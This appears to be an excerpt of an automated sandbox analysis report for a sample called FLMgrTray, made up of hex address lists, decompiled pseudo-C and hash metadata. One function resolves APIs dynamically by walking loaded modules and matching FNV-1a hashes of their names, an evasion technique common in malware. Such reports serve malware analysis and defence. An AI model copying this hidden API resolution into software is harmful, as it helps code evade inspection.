                                                                                        0x00189a6e
                                                                                        0x00189a71
                                                                                        0x00189a72
                                                                                        0x00189a75
                                                                                        0x00189a78
                                                                                        0x00189a7b
                                                                                        0x00000000
                                                                                        0x00189a7d
                                                                                        0x00189a7d
                                                                                        0x00189a7d
                                                                                        0x00000000
                                                                                        0x00189a7d
                                                                                        0x00000000
                                                                                        0x00189a7b
                                                                                        0x00000000
                                                                                        0x00189a56
                                                                                        0x00189a54
                                                                                        0x00189a4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189ad6
                                                                                        0x00189ad6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189ae2
                                                                                        0x00189ae2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188510
                                                                                        0x00189612
                                                                                        0x0018961d
                                                                                        0x0018961d
                                                                                        0x00000000
                                                                                        0x00188e30

                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 00188E9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3510742995-0
                                                                                        • Opcode ID: 68345b12182cbaa716ae97655f5df0ddc4335e77db83a482882b50ba7634a991
                                                                                        • Instruction ID: b2ccc783c4ba92dc0a0f3b460f63ec491782ec76566ad1b4bf2ba159669a501e
                                                                                        • Opcode Fuzzy Hash: 68345b12182cbaa716ae97655f5df0ddc4335e77db83a482882b50ba7634a991
                                                                                        • Instruction Fuzzy Hash: 87512871E0061AAFCB18DFA9D5804ADFBF5BF48310B14816AE819EB391D771DA81CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00164BB0(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                        				signed int _v8;
                                                                                        				char _v12;
                                                                                        				void _v268;
                                                                                        				intOrPtr _v272;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t26;
                                                                                        				intOrPtr _t34;
                                                                                        				void* _t36;
                                                                                        				intOrPtr _t43;
                                                                                        				intOrPtr _t46;
                                                                                        				intOrPtr* _t56;
                                                                                        				void* _t57;
                                                                                        				void* _t58;
                                                                                        				signed int _t59;
                                                                                        
                                                                                        				_t26 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v8 = _t26 ^ _t59;
                                                                                        				_t43 = _a8;
                                                                                        				_t57 = __ecx;
                                                                                        				memset( &_v268, 0, 0x101);
                                                                                        				_t56 = _a4;
                                                                                        				_t46 =  *((intOrPtr*)(_t56 + 4)) -  *_t56;
                                                                                        				if(_t46 == 0) {
                                                                                        					L6:
                                                                                        					return E001755F4(_v8 ^ _t59);
                                                                                        				} else {
                                                                                        					 *((intOrPtr*)( *((intOrPtr*)(_t57 + 4)) + 4)) = _t46;
                                                                                        					 *((intOrPtr*)( *((intOrPtr*)(_t57 + 4)))) =  *_t56;
                                                                                        					_t34 =  *((intOrPtr*)(_t57 + 4));
                                                                                        					do {
                                                                                        						 *((intOrPtr*)(_t34 + 0x10)) = 0x100;
                                                                                        						 *((intOrPtr*)( *((intOrPtr*)(_t57 + 4)) + 0xc)) =  &_v268;
                                                                                        						_t36 = E00188470(_t43, _t58,  *((intOrPtr*)(_t57 + 4)), 0); // executed
                                                                                        						_t58 = _t36;
                                                                                        						if(_t58 < 0xfffffffc) {
                                                                                        							goto L5;
                                                                                        						} else {
                                                                                        							if(_t58 <= 0xfffffffd) {
                                                                                        								L8:
                                                                                        								E00189C50( *((intOrPtr*)(_t57 + 4)));
                                                                                        								return E001755F4(_v8 ^ _t59);
                                                                                        							} else {
                                                                                        								if(_t58 == 2) {
                                                                                        									_t58 = 0xfffffffd;
                                                                                        									goto L8;
                                                                                        								} else {
                                                                                        									goto L5;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L9;
                                                                                        						L5:
                                                                                        						E00164940(_t43, _t43, _t57, _t58,  *((intOrPtr*)(_t43 + 4)),  &_v268,  &_v12 -  *((intOrPtr*)( *((intOrPtr*)(_t57 + 4)) + 0x10)), _v272); // executed
                                                                                        						_t34 =  *((intOrPtr*)(_t57 + 4));
                                                                                        					} while ( *((intOrPtr*)(_t34 + 0x10)) == 0);
                                                                                        					goto L6;
                                                                                        				}
                                                                                        				L9:
                                                                                        			}




















                                                                                        0x00164bb9
                                                                                        0x00164bc0
                                                                                        0x00164bc4
                                                                                        0x00164bd7
                                                                                        0x00164bd9
                                                                                        0x00164bde
                                                                                        0x00164be7
                                                                                        0x00164be9
                                                                                        0x00164c5a
                                                                                        0x00164c6a
                                                                                        0x00164beb
                                                                                        0x00164bee
                                                                                        0x00164bf6
                                                                                        0x00164bf8
                                                                                        0x00164c00
                                                                                        0x00164c00
                                                                                        0x00164c12
                                                                                        0x00164c18
                                                                                        0x00164c1d
                                                                                        0x00164c22
                                                                                        0x00000000
                                                                                        0x00164c24
                                                                                        0x00164c27
                                                                                        0x00164c72
                                                                                        0x00164c75
                                                                                        0x00164c8c
                                                                                        0x00164c29
                                                                                        0x00164c2c
                                                                                        0x00164c6d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00164c2c
                                                                                        0x00164c27
                                                                                        0x00000000
                                                                                        0x00164c2e
                                                                                        0x00164c4a
                                                                                        0x00164c4f
                                                                                        0x00164c52
                                                                                        0x00000000
                                                                                        0x00164c00
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(?,00000000,00000101), ref: 00164BD9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID:
                                                                                        • API String ID: 2221118986-0
                                                                                        • Opcode ID: 5ef6dc1fef05d285b4ebf1b0fbeea3cb5c4e4623fb990515423db255c3482ebc
                                                                                        • Instruction ID: 988ffab666bedaf86565987733cfe801a186b254d0ddc58689d18941954994a1
                                                                                        • Opcode Fuzzy Hash: 5ef6dc1fef05d285b4ebf1b0fbeea3cb5c4e4623fb990515423db255c3482ebc
                                                                                        • Instruction Fuzzy Hash: 9621A071600109AFC714EF28D981EA9F7A1FB55310F0182A9E8699B391CB71ED60CFD0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0016C360(void** __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                        				void* _t6;
                                                                                        				intOrPtr _t8;
                                                                                        				void** _t9;
                                                                                        				int _t12;
                                                                                        				void* _t14;
                                                                                        
                                                                                        				_t9 = __ecx;
                                                                                        				_t12 = _a8 - _a4;
                                                                                        				_t6 = E00174E80(__ecx, _t12); // executed
                                                                                        				if(_t6 != 0) {
                                                                                        					_t14 =  *__ecx;
                                                                                        					memmove(_t14, _a4, _t12);
                                                                                        					_t8 = _t14 + _t12;
                                                                                        					 *((intOrPtr*)(_t9 + 4)) = _t8;
                                                                                        					return _t8;
                                                                                        				}
                                                                                        				return _t6;
                                                                                        			}








                                                                                        0x0016c368
                                                                                        0x0016c36a
                                                                                        0x0016c36e
                                                                                        0x0016c375
                                                                                        0x0016c378
                                                                                        0x0016c37f
                                                                                        0x0016c387
                                                                                        0x0016c38a
                                                                                        0x00000000
                                                                                        0x0016c38d
                                                                                        0x0016c391

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(?,?,?,?,?), ref: 0016C37F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2162964266-0
                                                                                        • Opcode ID: 1eb3a48f67f6861fadb10a7e6774cb0ddf97e24b1c8e36d205c48b9ff3432c8b
                                                                                        • Instruction ID: e3f114fcdbc8136db5d0efb1617e14c1f95cda6a246b933c44f48e1e21aa5e6e
                                                                                        • Opcode Fuzzy Hash: 1eb3a48f67f6861fadb10a7e6774cb0ddf97e24b1c8e36d205c48b9ff3432c8b
                                                                                        • Instruction Fuzzy Hash: EAE08677501118BB8F009F99EC40DDABB6DEF9A3607058126FE049B201D372E91587F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0018BE40(signed int _a8, signed int _a12) {
                                                                                        				void* _t5;
                                                                                        
                                                                                        				_t5 = malloc(_a8 * _a12); // executed
                                                                                        				return _t5;
                                                                                        			}




                                                                                        0x0018be4b
                                                                                        0x0018be54

                                                                                        APIs
                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0018BE4B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: malloc
                                                                                        • String ID:
                                                                                        • API String ID: 2803490479-0
                                                                                        • Opcode ID: 5fadd12b7fad6cf70d6f25666a17b321fa201f1b342e06cc01da15ddf2d92a57
                                                                                        • Instruction ID: e8481d54ff8cd80089dd7c54ab3dea4b988343eb975cc26637a9c22f65d1c0ee
                                                                                        • Opcode Fuzzy Hash: 5fadd12b7fad6cf70d6f25666a17b321fa201f1b342e06cc01da15ddf2d92a57
                                                                                        • Instruction Fuzzy Hash: 37B092B384030D578B00EE98A98286A739CABA4620F084421BA1C8B241E631F6608AA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 38%
                                                                                        			E00180F20(char _a4, int _a20, signed int _a24, char _a28, signed int _a48, intOrPtr _a52) {
                                                                                        				intOrPtr _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				short _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				char _v32;
                                                                                        				intOrPtr* _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				intOrPtr _v72;
                                                                                        				intOrPtr _v80;
                                                                                        				intOrPtr _v84;
                                                                                        				char* _v88;
                                                                                        				int _v92;
                                                                                        				intOrPtr _v96;
                                                                                        				void _v100;
                                                                                        				void* __ebp;
                                                                                        				signed int _t82;
                                                                                        				signed int _t83;
                                                                                        				short _t87;
                                                                                        				intOrPtr* _t102;
                                                                                        				intOrPtr _t103;
                                                                                        				intOrPtr* _t104;
                                                                                        				intOrPtr _t109;
                                                                                        				intOrPtr _t112;
                                                                                        				intOrPtr _t115;
                                                                                        				intOrPtr _t117;
                                                                                        				signed int _t119;
                                                                                        				signed int _t127;
                                                                                        				signed int _t129;
                                                                                        				signed int _t135;
                                                                                        				char _t142;
                                                                                        				intOrPtr _t145;
                                                                                        				signed int _t146;
                                                                                        				intOrPtr _t154;
                                                                                        				signed int _t156;
                                                                                        				signed int _t157;
                                                                                        				void* _t158;
                                                                                        				void* _t159;
                                                                                        				intOrPtr* _t161;
                                                                                        				intOrPtr* _t162;
                                                                                        				void* _t165;
                                                                                        				intOrPtr* _t168;
                                                                                        				signed int _t170;
                                                                                        				signed int* _t171;
                                                                                        				intOrPtr _t172;
                                                                                        				signed int _t177;
                                                                                        				signed int _t179;
                                                                                        				void* _t180;
                                                                                        				void* _t182;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E170);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t82 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t83 = _t82 ^ _t179;
                                                                                        				_v20 = _t83;
                                                                                        				_push(_t83);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v8 = 1;
                                                                                        				memset( &_v100, 0, 0x3c);
                                                                                        				asm("movq xmm0, [0x190f84]");
                                                                                        				_t182 = _t180 - 0x54 + 0xc;
                                                                                        				_t87 =  *0x190f8c; // 0x36
                                                                                        				_t170 = 0;
                                                                                        				_v100 = 0x3c;
                                                                                        				_v92 = 0;
                                                                                        				asm("movq [ebp-0x1c], xmm0");
                                                                                        				_v24 = _t87;
                                                                                        				goto L1;
                                                                                        				while(1) {
                                                                                        					L3:
                                                                                        					_t165 = 0;
                                                                                        					_t171 =  *(_t102 + 0x30);
                                                                                        					_v36 = _t102;
                                                                                        					_t127 = 0x811c9dc5;
                                                                                        					_t154 =  >  ? 0 : ( *(_t102 + 0x2c) & 0xfffe) + 1 >> 1;
                                                                                        					_v40 = _t154;
                                                                                        					if(_t154 == 0) {
                                                                                        						goto L9;
                                                                                        					}
                                                                                        					_t103 = _t154;
                                                                                        					do {
                                                                                        						_t38 =  *_t171 - 0x41; // -49
                                                                                        						_t135 =  *_t171;
                                                                                        						if(_t38 <= 0x19) {
                                                                                        							_t135 = _t135 | 0x00000020;
                                                                                        						}
                                                                                        						_t165 = _t165 + 1;
                                                                                        						_t127 = (_t135 ^ _t127) * 0x1000193;
                                                                                        						_t171 =  &(_t171[0]);
                                                                                        					} while (_t165 != _t103);
                                                                                        					_t102 = _v36;
                                                                                        					if(_t127 == 0x4f644736) {
                                                                                        						_t172 =  *((intOrPtr*)(_t102 + 0x18));
                                                                                        						_t104 =  *0x19dba8; // 0x0
                                                                                        						_v36 = _t172;
                                                                                        						if(_t104 != 0) {
                                                                                        							L26:
                                                                                        							 *_t104( &_v100);
                                                                                        							_t156 = _a24;
                                                                                        							asm("sbb esi, esi");
                                                                                        							if(_t156 >= 8) {
                                                                                        								_t143 = _a4;
                                                                                        								_t159 = 2 + _t156 * 2;
                                                                                        								_t112 = _t143;
                                                                                        								if(_t159 >= 0x1000) {
                                                                                        									_t70 = _t143 - 4; // 0xfffff95f
                                                                                        									_t143 =  *_t70;
                                                                                        									_t159 = _t159 + 0x23;
                                                                                        									if(_t112 > 0x1f) {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									}
                                                                                        								}
                                                                                        								_push(_t159);
                                                                                        								E00175733(_t112, _t143);
                                                                                        								_t182 = _t182 + 8;
                                                                                        							}
                                                                                        							_t157 = _a48;
                                                                                        							_a20 = 0;
                                                                                        							_a24 = 7;
                                                                                        							_a4 = 0;
                                                                                        							if(_t157 >= 8) {
                                                                                        								_t142 = _a28;
                                                                                        								_t158 = 2 + _t157 * 2;
                                                                                        								_t109 = _t142;
                                                                                        								if(_t158 >= 0x1000) {
                                                                                        									_t142 =  *((intOrPtr*)(_t142 - 4));
                                                                                        									_t158 = _t158 + 0x23;
                                                                                        									if(_t109 > 0x1f) {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									}
                                                                                        								}
                                                                                        								_push(_t158);
                                                                                        								E00175733(_t109, _t142);
                                                                                        							}
                                                                                        							 *[fs:0x0] = _v16;
                                                                                        							return E001755F4(_v20 ^ _t179);
                                                                                        						}
                                                                                        						if(_t172 == 0) {
                                                                                        							L24:
                                                                                        							_t104 = 0;
                                                                                        							L25:
                                                                                        							 *0x19dba8 = _t104;
                                                                                        							goto L26;
                                                                                        						}
                                                                                        						_t115 =  *((intOrPtr*)(_t172 + 0x3c));
                                                                                        						_t145 =  *((intOrPtr*)(_t115 + _t172 + 0x78)) + _t172;
                                                                                        						_v28 =  *((intOrPtr*)(_t115 + _t172 + 0x7c));
                                                                                        						_v28 = _t145;
                                                                                        						if(_t145 == _t172) {
                                                                                        							goto L24;
                                                                                        						}
                                                                                        						_t117 =  *((intOrPtr*)(_t145 + 0x18));
                                                                                        						_t129 = 0;
                                                                                        						_v40 = _t117;
                                                                                        						if(_t117 == 0) {
                                                                                        							goto L24;
                                                                                        						}
                                                                                        						_t168 =  *((intOrPtr*)(_t145 + 0x20)) + _t172;
                                                                                        						while(1) {
                                                                                        							_t161 =  *_t168 + _t172;
                                                                                        							_t177 = 0x811c9dc5;
                                                                                        							_t146 =  *_t161;
                                                                                        							_t162 = _t161 + 1;
                                                                                        							if(_t146 == 0) {
                                                                                        								goto L21;
                                                                                        							} else {
                                                                                        								goto L16;
                                                                                        							}
                                                                                        							do {
                                                                                        								L16:
                                                                                        								_t119 = _t146;
                                                                                        								if(_t146 - 0x41 <= 0x19) {
                                                                                        									_t119 = _t119 | 0x00000020;
                                                                                        								}
                                                                                        								_t146 =  *_t162;
                                                                                        								_t177 = (_t119 ^ _t177) * 0x1000193;
                                                                                        								_t162 = _t162 + 1;
                                                                                        							} while (_t146 != 0);
                                                                                        							if(_t177 == 0x50206cf2) {
                                                                                        								_t178 = _v28;
                                                                                        								_t104 =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0x1c)) + ( *( *((intOrPtr*)(_t178 + 0x24)) + _t129 * 2 + _v36) & 0x0000ffff) * 4 + _v36)) + _t163;
                                                                                        								goto L25;
                                                                                        							}
                                                                                        							_t117 = _v40;
                                                                                        							L21:
                                                                                        							_t129 = _t129 + 1;
                                                                                        							_t168 = _t168 + 4;
                                                                                        							if(_t129 == _t117) {
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							_t172 = _v36;
                                                                                        						}
                                                                                        					}
                                                                                        					L9:
                                                                                        					_t102 =  *_t102;
                                                                                        				}
                                                                                        				L1:
                                                                                        				 *(_t179 + _t170 * 2 - 0x1c) =  *(_t179 + _t170 * 2 - 0x1c) ^ _t170 - ((0x4ec4ec4f * _t170 >> 0x00000020 >> 0x00000004 >> 0x0000001f) + (0x4ec4ec4f * _t170 >> 0x00000020 >> 0x00000004)) * 0x00000034 + 0x00000032;
                                                                                        				_t170 = _t170 + 1;
                                                                                        				if(_t170 < 5) {
                                                                                        					goto L1;
                                                                                        				} else {
                                                                                        					_v88 =  &_v32;
                                                                                        					_t96 =  >=  ? _a4 :  &_a4;
                                                                                        					_v84 =  >=  ? _a4 :  &_a4;
                                                                                        					_t98 =  >=  ? _a28 :  &_a28;
                                                                                        					_v80 =  >=  ? _a28 :  &_a28;
                                                                                        					_v72 = _a52;
                                                                                        					_v96 = 0x40;
                                                                                        					_t102 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                                                                                        					goto L3;
                                                                                        				}
                                                                                        			}




















































                                                                                        0x00180f23
                                                                                        0x00180f25
                                                                                        0x00180f30
                                                                                        0x00180f34
                                                                                        0x00180f39
                                                                                        0x00180f3b
                                                                                        0x00180f41
                                                                                        0x00180f45
                                                                                        0x00180f50
                                                                                        0x00180f5a
                                                                                        0x00180f5f
                                                                                        0x00180f67
                                                                                        0x00180f6a
                                                                                        0x00180f70
                                                                                        0x00180f72
                                                                                        0x00180f79
                                                                                        0x00180f80
                                                                                        0x00180f85
                                                                                        0x00180f85
                                                                                        0x00180ff1
                                                                                        0x00180ff1
                                                                                        0x00180ff5
                                                                                        0x00180ff7
                                                                                        0x00180ffd
                                                                                        0x00181000
                                                                                        0x0018100d
                                                                                        0x00181010
                                                                                        0x00181015
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00181017
                                                                                        0x00181020
                                                                                        0x00181022
                                                                                        0x00181028
                                                                                        0x0018102b
                                                                                        0x0018102d
                                                                                        0x0018102d
                                                                                        0x00181032
                                                                                        0x00181033
                                                                                        0x00181039
                                                                                        0x0018103c
                                                                                        0x00181040
                                                                                        0x00181049
                                                                                        0x0018104f
                                                                                        0x00181052
                                                                                        0x00181057
                                                                                        0x0018105c
                                                                                        0x001810fa
                                                                                        0x001810fe
                                                                                        0x00181100
                                                                                        0x00181107
                                                                                        0x0018110e
                                                                                        0x00181110
                                                                                        0x00181113
                                                                                        0x0018111a
                                                                                        0x00181122
                                                                                        0x00181124
                                                                                        0x00181124
                                                                                        0x00181127
                                                                                        0x00181132
                                                                                        0x00181134
                                                                                        0x00181134
                                                                                        0x00181132
                                                                                        0x0018113a
                                                                                        0x0018113c
                                                                                        0x00181141
                                                                                        0x00181141
                                                                                        0x00181144
                                                                                        0x00181149
                                                                                        0x00181150
                                                                                        0x00181157
                                                                                        0x0018115e
                                                                                        0x00181160
                                                                                        0x00181163
                                                                                        0x0018116a
                                                                                        0x00181172
                                                                                        0x00181174
                                                                                        0x00181177
                                                                                        0x00181182
                                                                                        0x00181184
                                                                                        0x00181184
                                                                                        0x00181182
                                                                                        0x0018118a
                                                                                        0x0018118c
                                                                                        0x00181191
                                                                                        0x00181199
                                                                                        0x001811b1
                                                                                        0x001811b1
                                                                                        0x00181064
                                                                                        0x001810f3
                                                                                        0x001810f3
                                                                                        0x001810f5
                                                                                        0x001810f5
                                                                                        0x00000000
                                                                                        0x001810f5
                                                                                        0x0018106a
                                                                                        0x00181075
                                                                                        0x00181077
                                                                                        0x0018107a
                                                                                        0x0018107f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00181081
                                                                                        0x00181084
                                                                                        0x00181086
                                                                                        0x0018108b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00181090
                                                                                        0x00181092
                                                                                        0x00181094
                                                                                        0x00181096
                                                                                        0x0018109b
                                                                                        0x0018109d
                                                                                        0x001810a0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001810a2
                                                                                        0x001810a2
                                                                                        0x001810a7
                                                                                        0x001810aa
                                                                                        0x001810ac
                                                                                        0x001810ac
                                                                                        0x001810af
                                                                                        0x001810b3
                                                                                        0x001810b9
                                                                                        0x001810ba
                                                                                        0x001810c4
                                                                                        0x001810d6
                                                                                        0x001810ef
                                                                                        0x00000000
                                                                                        0x001810ef
                                                                                        0x001810c6
                                                                                        0x001810c9
                                                                                        0x001810c9
                                                                                        0x001810ca
                                                                                        0x001810cf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001810d1
                                                                                        0x001810d1
                                                                                        0x00181092
                                                                                        0x0018104b
                                                                                        0x0018104b
                                                                                        0x0018104b
                                                                                        0x00180f90
                                                                                        0x00180fab
                                                                                        0x00180fb0
                                                                                        0x00180fb4
                                                                                        0x00000000
                                                                                        0x00180fb6
                                                                                        0x00180fbd
                                                                                        0x00180fc3
                                                                                        0x00180fcb
                                                                                        0x00180fd1
                                                                                        0x00180fd5
                                                                                        0x00180fdb
                                                                                        0x00180fe4
                                                                                        0x00180fee
                                                                                        0x00000000
                                                                                        0x00180fee

                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(00000005,00000000,0000003C,2C80D730,00000005,?), ref: 00180F5A
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00181134
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00181184
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memset
                                                                                        • String ID: 6GdO
                                                                                        • API String ID: 3820209055-1713574278
                                                                                        • Opcode ID: 2a131068bfb0c82c0ed2a2dd8fd8461eae0de23e0c82bec26b701d2c1f84b28d
                                                                                        • Instruction ID: 240077451cb8668fb927bed65223968fa8b213dac02385ad76fe86980c304b7c
                                                                                        • Opcode Fuzzy Hash: 2a131068bfb0c82c0ed2a2dd8fd8461eae0de23e0c82bec26b701d2c1f84b28d
                                                                                        • Instruction Fuzzy Hash: BD81B072A00259DFCB14DF68CC90AADB7F5FB49714F15812AE805AB350D735EA82CF80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
                                                                                        			E00182540(void** __ecx, void* __edx) {
                                                                                        				void* _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				struct _OSVERSIONINFOW _v296;
                                                                                        				void** _v300;
                                                                                        				void** _v304;
                                                                                        				void* __edi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t23;
                                                                                        				signed int _t24;
                                                                                        				void* _t31;
                                                                                        				void* _t35;
                                                                                        				void* _t44;
                                                                                        				void* _t45;
                                                                                        				void** _t48;
                                                                                        				signed int _t50;
                                                                                        
                                                                                        				_t44 = __edx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E33E);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t23 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t24 = _t23 ^ _t50;
                                                                                        				_v20 = _t24;
                                                                                        				_push(_t45);
                                                                                        				_push(_t24);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t48 = __ecx;
                                                                                        				_v300 = __ecx;
                                                                                        				_v304 = __ecx;
                                                                                        				 *__ecx = 0;
                                                                                        				__ecx[7] = 0;
                                                                                        				__ecx[8] = 7;
                                                                                        				__ecx[3] = 0;
                                                                                        				_v8 = 0;
                                                                                        				__ecx[9] = 0;
                                                                                        				__ecx[0xb] = 0;
                                                                                        				if(__ecx[1] != 0x80000001) {
                                                                                        					_t31 =  *__ecx;
                                                                                        					__ecx[1] = 0x80000001;
                                                                                        					if(_t31 != 0) {
                                                                                        						if(__ecx[2] == 0) {
                                                                                        							RegFlushKey(_t31);
                                                                                        						}
                                                                                        						RegCloseKey( *_t48);
                                                                                        						 *_t48 = 0;
                                                                                        						E00163540(_t35, _t44, _t45, 0x18fe18, 0);
                                                                                        					}
                                                                                        				}
                                                                                        				_t48[0xa] = 0xf003f;
                                                                                        				_t48[2] = 1;
                                                                                        				if( *0x19e018 == 0) {
                                                                                        					 *0x19e018 = 1;
                                                                                        					 *0x19e019 = 1;
                                                                                        					_v296.dwOSVersionInfoSize = 0x114;
                                                                                        					GetVersionExW( &_v296);
                                                                                        					_t42 =  !=  ? _v296.dwPlatformId :  *0x19e01c;
                                                                                        					 *0x19e01c =  !=  ? _v296.dwPlatformId :  *0x19e01c;
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return E001755F4(_v20 ^ _t50);
                                                                                        			}



















                                                                                        0x00182540
                                                                                        0x00182543
                                                                                        0x00182545
                                                                                        0x00182550
                                                                                        0x00182557
                                                                                        0x0018255c
                                                                                        0x0018255e
                                                                                        0x00182562
                                                                                        0x00182563
                                                                                        0x00182567
                                                                                        0x0018256d
                                                                                        0x0018256f
                                                                                        0x00182575
                                                                                        0x0018257d
                                                                                        0x00182583
                                                                                        0x0018258a
                                                                                        0x00182591
                                                                                        0x0018259c
                                                                                        0x0018259f
                                                                                        0x001825a2
                                                                                        0x001825a5
                                                                                        0x001825a7
                                                                                        0x001825a9
                                                                                        0x001825b2
                                                                                        0x001825b8
                                                                                        0x001825bb
